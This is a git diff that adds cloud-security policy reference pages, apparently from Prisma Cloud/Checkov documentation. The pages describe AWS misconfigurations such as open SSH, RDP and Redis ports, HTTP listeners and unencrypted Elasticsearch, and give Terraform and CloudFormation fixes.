ec2 describe-security-groups +--group-ids sg-xxxxxxxxxxxxxxxxx +--region us-east-1", +} +---- + +. Review and EC2 instances using the security group. ++ + +[source,shell] +---- +{ + "aws ec2 describe-instances +--filters Name=instance.group-id,Values=sg-xxxxxxxxxxxxxxxxx +--region us-east-1", + +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + + +* *Resource:* aws_security_group + + +[source,go] +---- +{ + "resource "aws_security_group" "example" { +... +ingress { + cidr_blocks = [ +- "0.0.0.0/0" ++ "10.0.0.1/32" + ] + from_port = 22 + to_port = 22 + protocol = "tcp" + } + +}", +} +---- + + +*CloudFormation* + + + +* *Resource:* AWS::EC2::SecurityGroup +* *Arguments:* Properties.SecurityGroupIngress + + +[source,yaml] +---- +{ + "Type: AWS::EC2::SecurityGroup + Properties: + ... + SecurityGroupIngress: + - Description: SSH Ingress + IpProtocol: tcp + FromPort: 22 + ToPort: 22 +- CidrIp: "0.0.0.0/0" ++ CidrIp: "10.10.10.0/24"", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-19.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-19.adoc new file mode 100644 index 000000000..3a08b32a7 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-19.adoc @@ -0,0 +1,27 @@ +== Security Group attached to EC2 instance allows inbound traffic from all to TCP port 6379 (Redis) + + +=== Description + + +Redis should not be publicly accessible from the internet to protect data from unauthorized user access, data loss and possible leakage of sensitive data. +As a general precaution if any resource needs to be open to the internet, it must first undergo a security review and approval from DSO. + +=== Fix - Runtime + + +*Procedure* + + + +. Change the access control policy and security groups to make the Redis endpoint private. + +. Allow access to a specific list of IP addresses. + +. Once the Redis endpoint is not publicly accessible Bridgecrew will automatically close the issue. + +. You can also request exception from the policy violation details page. + +. SecOps will review and involve DSO if required and grant exception; ++ +Bridgecrew will automatically ignore this resource until the expiry of exception. diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-2.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-2.adoc new file mode 100644 index 000000000..f54b5347a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-2.adoc @@ -0,0 +1,147 @@ +== AWS Security Group allows all traffic on RDP port (3389) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b82f90ce-ed8b-4b49-970c-2268b0a6c2e5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py[CKV_AWS_25] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + +//// +Bridgecrew +Prisma Cloud +* AWS Security Group allows all traffic on RDP port (3389)* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b82f90ce-ed8b-4b49-970c-2268b0a6c2e5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py [CKV_AWS_25] + +|Severity +|LOW + +|Subtype +|Build +, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== +//// + + +=== Description + + +Security groups are stateful and provide filtering of ingress/egress network traffic to AWS resources. +We recommend that security groups do not allow unrestricted ingress access to port 3389. +Removing unfettered connectivity to remote console services, such as SSH, reduces a server's exposure to risk. + + +*Rationale Removing unfettered connectivity to remote console services, such as RDP, reduces a server's exposure to risk.* + + +//// +=== Fix - Runtime + + +* AWS Console* + + +To implement the prescribed state, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/vpc/ [Amazon VPC console]. + +. In the left pane, click * Security Groups*. + +. For each security group, perform the following: a) Select the _security group_. ++ +b) Click * Inbound Rules*. ++ +c) Identify the rules to be removed. ++ +d) Click * X* in the Remove column. + +. Click * Save*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +The issue is the CIDR specified in the ingress control rule - "0.0.0.0/0". +Change it from this: + + +[source,go] +---- +{ + "resource "aws_security_group" "example" { + ... + ingress { + from_port = 3389 + to_port = 3389 + protocol = "tcp" +- cidr_blocks = ["0.0.0.0/0"] ++ cidr_blocks = ["10.0.0.1/32"] + } + +}", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::EC2::SecurityGroup +* *Arguments:* Properties.SecurityGroupIngress + + +[source,yaml] +---- +{ + "Type: AWS::EC2::SecurityGroup + Properties: + ... + SecurityGroupIngress: + - Description: SSH Ingress + IpProtocol: tcp + FromPort: 3389 + ToPort: 3389 +- CidrIp: "0.0.0.0/0" ++ CidrIp: "10.10.10.0/24"", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-27.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-27.adoc new file mode 100644 index 000000000..61e94068f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-27.adoc @@ -0,0 +1,49 @@ +== Uses default settings of a VPC + + +=== Description + + +A default VPC is a logically isolated virtual network created automatically for your AWS account when you provision EC2 instances. +The default settings of a VPC are not suitable for applications that use multi-tier architectures. +We recommend you create a non-default _hardened_ VPC that suits its specific networking requirements. + +=== Fix - Runtime + + +*CLI Command* + + + +. To list the existing default VPCs run a describe-vpcs command to return the ID of the default VPC created in the selected AWS region: ++ +[,bash] +---- +aws ec2 describe-vpcs +--region us-east-2 +--query 'Vpcs[?(IsDefault==`true`)].VpcId | []' +---- + +. The command output should return the requested VPC identifier. + +. Run the describe-instances command using the ID of the default VPC as a filter parameter and custom query filters to return the IDs of the EC2: + +[,bash] +---- +aws ec2 describe-instances +--region us-east-1 +--filters "Name=vpc-id,Values=vpc-id" +--query 'Reservations[*].Instances[*].InstanceId[]' +---- + +. The command output should return the identifiers of the EC2 instances launched within the default VPC, alternatively it will return an empty array. + +. To remove default VPCs that are not currently in use, use the delete-vpc command: + +[,bash] +---- + +aws ec2 delete-vpc --vpc-id vpc-a01106c2 +---- ++ +NOTE: You must detach or delete all gateways and resources that are associated with the VPC before you can delete it. diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-29.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-29.adoc new file mode 100644 index 000000000..169c1e342 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-29.adoc @@ -0,0 +1,103 @@ +== AWS Elastic Load Balancer v2 (ELBv2) listener that allow connection requests over HTTP + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 81c50f65-faa1-4d66-b8e2-d26eaeb08447 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py[CKV_AWS_2] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +An internet-facing AWS ELB/ALB is a public resource on your network that is completely exposed to the internet. +It has a publicly resolvable DNS name, that can accept HTTP(S) requests from clients over the Internet. +External actors gaining knowledge to this information can potentially attempt to access the EC2 instances that are registered with the load balancer. +When an AWS ALB has no HTTPS listeners, front-end connections between the web clients and the load balancer could become targeted by man-in-the-middle attacks and traffic interception techniques. + +//// +=== Fix - Runtime + + +* AWS Console* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the http://console.aws.amazon.com/ec2/ [Amazon EC2 console]. + +. Navigate to * LOAD BALANCING*, select * Load Balancers*. + +. Select a _load balancer_, then select * Listeners*. + +. To add a _listener_, select * Add Listener*. ++ + +.. For Protocol : port, select HTTPS and keep the default port or type a different port. ++ + +.. For Default actions, do one of the following: Choose Add action, Forward to and choose a target group. ++ + Choose Add action, Redirect to and provide the URL for the redirect. ++ + Choose Add action, Return fixed response and provide a response code and optional response body. ++ +To save the action, select the * checkmark* icon. ++ + +.. For Security policy, it is recommended that you keep the default security policy. ++ + +.. For Default SSL certificate, do one of the following: If you created or imported a _certificate_ using * AWS Certificate Manager*, select * From ACM* and select the _certificate_. ++ + If you uploaded a _certificate_ using * IAM*, select * From IAM* and select the _certificate_. + +. Click * Save*. +//// + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::ElasticLoadBalancingV2::Listener +* *Arguments:* Properties.Protocol / Properties.DefaultActions + + +[source,yaml] +---- +Resources: + ListenerHTTPS: + Type: AWS::ElasticLoadBalancingV2::Listener + Properties: + ... + # Option 1: ++ Protocol: HTTPS # Or TCP / TLS / UDP / TCP_UDP + # Option 2: ++ DefaultActions: ++ - Type: redirect ++ RedirectConfig: ++ Protocol: HTTPS + ... +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-31.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-31.adoc new file mode 100644 index 000000000..606e6a17c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-31.adoc @@ -0,0 +1,84 @@ +== Not every Security Group rule has a description + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3c39f667-b442-4e79-90b2-55161c70d060 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py[CKV_AWS_23] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Descriptions can be up to 255 characters long and can be set and viewed from the AWS Management Console, AWS Command Line Interface (CLI), and the AWS APIs. +We recommend you add descriptive text to each of your Security Group Rules clarifying each rule's goals, this helps prevent developer errors. + +//// +=== Fix - Runtime + + +* AWS Console* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the http://console.aws.amazon.com/vpc/home [Amazon VPC console]. + +. Select * Security Groups*. + +. Select * Create Security Group*. + +. Select a _Security Group_ and review all of the descriptions. + +. To modify the rules and descriptions, click * Edit*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +Add a description to your ingress or egress rule. + + +[source,go] +---- +{ + "resource "aws_security_group" "examplea" { + name = var.es_domain + description = "Allow inbound traffic to ElasticSearch from VPC CIDR" + vpc_id = var.vpc + + + ingress { + cidr_blocks = ["10.0.0.0/16"] + + description = "What does this rule enable" + from_port = 80 + protocol = "tcp" + to_port = 80 + } + +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-32.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-32.adoc new file mode 100644 index 000000000..e5ae675ee --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-32.adoc @@ -0,0 +1,97 @@ +== CloudFront distribution ViewerProtocolPolicy is not set to HTTPS + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d183c5cd-6fe6-43a9-8fbf-6b4e44c84ec9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py[CKV_AWS_34] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform + +|=== + +=== Description + + +*AWS::CloudFront::Distribution ViewerCertificate* determines the distribution's SSL/TLS configuration for communicating with viewers. +We recommend you use the *ViewerProtocolPolicy* parameter to enable secure HTTPS communication between clients and your CloudFormation templates. +Most browsers and clients released after 2010 support server name indication. +AWS recommends to accept HTTPS connections only from viewers that support SNI and advises against receiving HTTPS connections from all viewers, including those that do not support SNI, set SslSupportMethod. +This also results in additional monthly charges from CloudFront. + +//// +=== Fix - Runtime + + +* Procedure* + + +Use * ViewerProtocolPolicy* in the * CacheBehavior* or * DefaultCacheBehavior*, and select * Redirect HTTP to HTTPS* or * HTTPS Only*. +To specify how CloudFront should use SSL/TLS to communicate with your custom origin, use * CustomOriginConfig*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudfront_distribution +* *Arguments:* `viewer_protocol_policy` under `default_cache_behavior` or `ordered_cache_behavior` must not be `allow-all`. +Acceptable values are `redirect-to-https` or `https-only`. + + +[source,go] +---- +resource "aws_cloudfront_distribution" "cloudfront" { + ... + default_cache_behavior { + ... + target_origin_id = "my-origin" + - viewer_protocol_policy = "allow-all" + + viewer_protocol_policy = "redirect-to-https" + } +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::CloudFront::Distribution +* *Arguments:* `ViewerProtocolPolicy` under Properties.DefaultCacheBehavior or Properties.CacheBehaviors must not be `allow-all`. +Acceptable values are `redirect-to-https` or `https-only`. + + +[source,yaml] +---- +Resources: + CloudFrontDistribution: + Type: 'AWS::CloudFront::Distribution' + Properties: + DistributionConfig: + ... + DefaultCacheBehavior: + ... +- ViewerProtocolPolicy: 'allow-all' ++ ViewerProtocolPolicy: 'https-only' # or 'redirect-to-https' + + CacheBehaviors: + - TargetOriginId: customorigin + ... +- ViewerProtocolPolicy: allow-all ++ ViewerProtocolPolicy: https-only # or redirect-to-https +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-4.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-4.adoc new file mode 100644 index 000000000..33acaad6e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-4.adoc @@ -0,0 +1,108 @@ +== AWS Default Security Group does not restrict all traffic + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2378dbf4-b104-4bda-9b05-7417affbba3f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml[CKV2_AWS_12] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +A VPC comes with a default security group that has an initial setting denying all inbound traffic, allowing all outbound traffic, and allowing all traffic between instances assigned to the security group. +If you do not specify a security group when you launch an instance, the instance is automatically assigned to this default security group. +Security groups are stateful and provide filtering of ingress/egress network traffic to AWS resources. +We recommend that your default security group restricts all inbound and outbound traffic. +The default VPC in every region should have its default security group updated to comply with this recommendation. +Any newly created VPCs will automatically contain a default security group that will need remediation to comply with this recommendation. +Configuring all VPC default security groups to restrict all traffic will encourage least privilege security group development and mindful placement of AWS resources into security groups. +This in-turn reduces the exposure of those resources. + +NOTE: When implementing this recommendation, VPC flow logging is invaluable in determining the least privilege port access required by systems to work properly. VPC flow logging can log all packet acceptances and rejections occurring under the current security groups. This dramatically reduces the primary barrier to least privilege engineering, discovering the minimum ports required by systems in the environment. +Even if the VPC flow logging recommendation described is not adopted as a permanent security measure, it should be used during any period of discovery and engineering for least privileged security groups. + + +//// +=== Fix - Runtime + + +* Procedure* + + +* Security Group Members: ** +To implement the prescribed state, follow these steps: + +. Identify AWS resources that exist within the default security group. + +. Create a set of least privilege security groups for those resources. + +. Place the resources in those security groups. + +. Remove the resources noted in Step 1 from the default security group. + + +* AWS Console* + + +* Security Group State* + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the http://console.aws.amazon.com/vpc/home [Amazon VPC console]. + +. Repeat the next steps for all VPCs, including the default VPC in each AWS region: ++ +a) In the left pane, click * Security Groups*. ++ +b) For each default security group, perform the following: ++ +i) Select the default _security group_. ++ +ii) Click * Inbound Rules*. ++ +iii) Remove any _inbound rules_. ++ +iv) Click * Outbound Rules*. ++ +v) Remove any _outbound rules_. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_default_security_group + aws_vpc +* *Arguments:* vpc_id (of aws_default_security_group) + + +[source,go] +---- +{ + "resource "aws_default_security_group" "default" { + vpc_id = aws_vpc.ok_vpc.id +}", + +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/s3-bucket-should-have-public-access-blocks-defaults-to-false-if-the-public-access-block-is-not-attached.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/s3-bucket-should-have-public-access-blocks-defaults-to-false-if-the-public-access-block-is-not-attached.adoc new file mode 100644 index 000000000..bca6d3331 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/s3-bucket-should-have-public-access-blocks-defaults-to-false-if-the-public-access-block-is-not-attached.adoc @@ -0,0 +1,64 @@ +== S3 Bucket does not have public access blocks + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a4d00808-eabf-45b9-84fd-723ddfe0e6de + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml[CKV2_AWS_6] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +When you create an S3 bucket, it is good practice to set the additional resource *aws_s3_bucket_public_access_block* to ensure the bucket is never accidentally public. +We recommend you ensure S3 bucket has public access blocks. +If the public access block is not attached it defaults to False. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_s3_bucket, aws_s3_bucket_public_access_block +* *Arguments:* _bucket *and of *block_public_acls_ aws_s3_bucket_public_access_block + + +[source,go] +---- +{ + " +resource "aws_s3_bucket" "bucket_good_1" { + bucket = "bucket_good" +} + + +resource "aws_s3_bucket_public_access_block" "access_good_1" { + bucket = aws_s3_bucket.bucket_good_1.id + + block_public_acls = true + block_public_policy = true +} + + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-policies.adoc b/code-security/policy-reference/aws-policies/aws-policies.adoc new file mode 100644 index 000000000..1e66194ac --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-policies.adoc @@ -0,0 +1,3 @@ +== AWS Policies + + diff --git a/code-security/policy-reference/aws-policies/aws-serverless-policies/aws-serverless-policies.adoc b/code-security/policy-reference/aws-policies/aws-serverless-policies/aws-serverless-policies.adoc new file mode 100644 index 000000000..0dd3145d7 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-serverless-policies/aws-serverless-policies.adoc @@ -0,0 +1,17 @@ +== AWS Serverless Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-aws-serverless-4.adoc[AWS Lambda functions with tracing not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py[CKV_AWS_50] +|LOW + +|xref:bc-aws-serverless-5.adoc[AWS Lambda encryption settings environmental variable is not set properly] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py[CKV_AWS_173] +|LOW + +|=== + diff --git a/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-4.adoc b/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-4.adoc new file mode 100644 index 000000000..5b6ac5f31 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-4.adoc @@ -0,0 +1,103 @@ +== AWS Lambda functions with tracing not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e38f45e2-eed5-4617-bbe8-3619b21dd419 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py[CKV_AWS_50] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +X-Ray tracing in lambda functions allows you to visualize and troubleshoot errors and performance bottlenecks, and investigate requests that resulted in an error. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/lambda/ [Amazon Lambda console]. + +. Open the function to modify. + +. Click the * Configuration* tab. + +. Open the * Monitoring and operations tools* on the left side. + +. Click * Edit*. + +. Enable * Active tracing* for AWS X-ray. + +. Click * Save*. + + +* CLI Command* + + +To enable X-Ray tracing for a function, use the following command: +---- +aws lambda update-function-configuration --function-name MY_FUNCTION \ +--tracing-config Mode=Active +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +Add the following block to a Terraform Lambda resource to add X-Ray tracing: + + +[source,go] +---- +{ + "tracing_config { + mode = "Active" +}", + +} +---- + +*CloudFormation* + + +For CloudFormation, use the following block under `Properties`: + + +[source,yaml] +---- +{ + ""TracingConfig": { + "Mode": "Active" +}", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-5.adoc b/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-5.adoc new file mode 100644 index 000000000..ea879948f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-5.adoc @@ -0,0 +1,75 @@ +== AWS Lambda encryption settings environmental variable is not set properly + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b3c159b3-00cb-42f3-8841-14e434421947 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py[CKV_AWS_173] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + +You can use environment variables to adjust your function's behavior without updating code. +An environment variable is a pair of strings that is stored in a function's version-specific configuration. +The Lambda runtime makes environment variables available to your code and sets additional environment variables that contain information about the function and invocation request. +Environment variables are not evaluated prior to the function invocation. +Any value you define is considered a literal string and not expanded. +Perform the variable evaluation in your function code. + +=== Fix - Buildtime + + +*Terraform* + + +aws_lambda_function +* *Resource:* aws_lambda_function +* *Arguments:* kms_key_arn + + +[source,go] +---- +{ + "resource "aws_lambda_function" "test_lambda" { + filename = "lambda_function_payload.zip" + function_name = "lambda_function_name" + role = aws_iam_role.iam_for_lambda.arn + handler = "index.test" + + # The filebase64sha256() function is available in Terraform 0.11.12 and later + # For Terraform 0.11.11 and earlier, use the base64sha256() function and the file() function: + # source_code_hash = "${base64sha256(file("lambda_function_payload.zip"))}" + source_code_hash = filebase64sha256("lambda_function_payload.zip") + + runtime = "nodejs12.x" + ++ kms_key_arn = "ckv_km" + + environment { + variables = { + foo = "bar" + } + + } +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-3-enable-encryptionatrest.adoc b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-3-enable-encryptionatrest.adoc new file mode 100644 index 000000000..f14e48465 --- /dev/null +++ b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-3-enable-encryptionatrest.adoc @@ -0,0 +1,77 @@ +== AWS Elasticsearch domain encryption for data at rest disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0a54c279-d08a-4443-a93b-6d109addd964 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py[CKV_AWS_5] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Encryption of data at rest is a security feature that helps prevent unauthorized access to your data. +This feature uses AWS Key Management Service (AWS KMS) to store and manage encryption keys, and the Advanced Encryption Standard algorithm with 256-bit keys (AES-256) to perform the encryption. +If enabled, the feature encrypts the domain's indices, logs, swap files, all data in the application directory, and automated snapshots. +We recommend you implement encryption at rest in order to protect a data store containing sensitive information from unauthorized access, and fulfill compliance requirements. + +//// +=== Fix - Runtime + + +* Procedure* + + +By default, domains do not encrypt data at rest, and you cannot configure existing domains to use EncryptionAtRest. +To enable EncryptionAtRest, you must create a new domain and migrate Elasticsearch to that domain. +You will also need, at minimum, read-only permissions to AWS KMS. +To create a new domain sign in to your AWS Console and select the Elasticsearch service (under Analytics), follow these steps: + +. Select * Create a new domain*. + +. Change the default * Encryption* setting to * enabled*. + +. Continue configuring your cluster. +//// + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::Elasticsearch::Domain +* *Argument:* Properties.EncryptionAtRestOptions.Enabled + + +[source,yaml] +---- +{ + "Resources: + ElasticsearchDomain: + Type: AWS::Elasticsearch::Domain + Properties: + ... + EncryptionAtRestOptions: ++ Enabled: True", +} +---- diff --git a/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-5.adoc b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-5.adoc new file mode 100644 index 000000000..daef32483 --- /dev/null +++ b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-5.adoc @@ -0,0 +1,73 @@ +== AWS Elasticsearch does not have node-to-node encryption enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f978f4db-d9b9-41df-bf4f-d8ce52019a9c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py[CKV_AWS_6] + +|Severity +|MEDIUM + +|Subtype +|Build +//'Run + +|Frameworks +|CloudFormation, Terraform, TerraformPlan, Serverless + +|=== + + + +=== Description + + +The AWS Elasticsearch Service allows you to host sensitive workloads with node-to-node encryption using Transport Layer Security (TLS) for all communications between instances in a cluster. +Node-to-node encryption ensures that any data sent to the Amazon Elasticsearch Service domain over HTTPS remains encrypted in-flight while it is being distributed and replicated between the nodes. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To enable the feature, you must create another domain and migrate your data. +Using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Navigate to the * Analytics* section, select * Elasticsearch Service*. + +. To enable _node-to-node encryption_ when you configure a new cluster, select * Node-to-node encryption*. +//// + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::Elasticsearch::Domain +* *Argument:* Properties.NodeToNodeEncryptionOptions.Enabled + + +[source,yaml] +---- +{ + "Resources: + ElasticsearchDomain: + Type: AWS::Elasticsearch::Domain + Properties: + ... + NodeToNodeEncryptionOptions: ++ Enabled: True", +} +---- diff --git a/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-6.adoc b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-6.adoc new file mode 100644 index 000000000..ccdf559ab --- /dev/null +++ b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-6.adoc @@ -0,0 +1,78 @@ +== AWS Elasticsearch domain is not configured with HTTPS + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0dfd7218-7605-4323-a143-8204ca83faea + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py[CKV_AWS_83] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Elasticsearch Service (Amazon ES) allows you to build applications without setting up and maintaining your own search cluster on Amazon EC2. +Amazon ES you can configure your domains to require HTTPS traffic, ensuring that communications between your clients and your domain are encrypted. +We recommend you configure the minimum required TLS version to *accept*. +This option is a useful additional security control to ensure that your clients are not misconfigured. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/es/home [Amazon Elasticsearch console]. + +. Open a domain. + +. Select * Actions* > * Modify encryptions* + +. Select _Require HTTPS for all traffic to the domain_. + +. Click * Submit*. +//// + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::Elasticsearch::Domain +* *Argument:* Properties.DomainEndpointOptions.EnforceHTTPS + + +[source,yaml] +---- +Resources: + Resource0: + Type: 'AWS::Elasticsearch::Domain' + Properties: + ... + DomainEndpointOptions: ++ EnforceHTTPS: True +---- diff --git a/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-7.adoc b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-7.adoc new file mode 100644 index 000000000..8129a9349 --- /dev/null +++ b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-7.adoc @@ -0,0 +1,136 @@ +== AWS Elasticsearch domain logging not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e1acdde6-67fc-4c86-b9f9-a22f87aef03b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py[CKV_AWS_84] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Elasticsearch Service (Amazon ES) exposes logs through CloudWatch. ES logs enable troubleshooting performance and stability issues, as well as audit logs to track user activity for compliance purposes. +Supported ES logs include error logs, search slow logs, index slow logs, and audit logs. +All logs are disabled by default. + +We recommend you enable Elasticsearch domain logging. + +NOTE: If enabled, standard CloudWatch pricing applies. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/es/home [Amazon Elasticsearch console]. + +. In the navigation pane, under * My domains*, select the domain that you want to update. ++ +4.Navigate to the * Logs* tab. ++ +For the log that you are working with, select * Enable*. + +. Create a * CloudWatch log 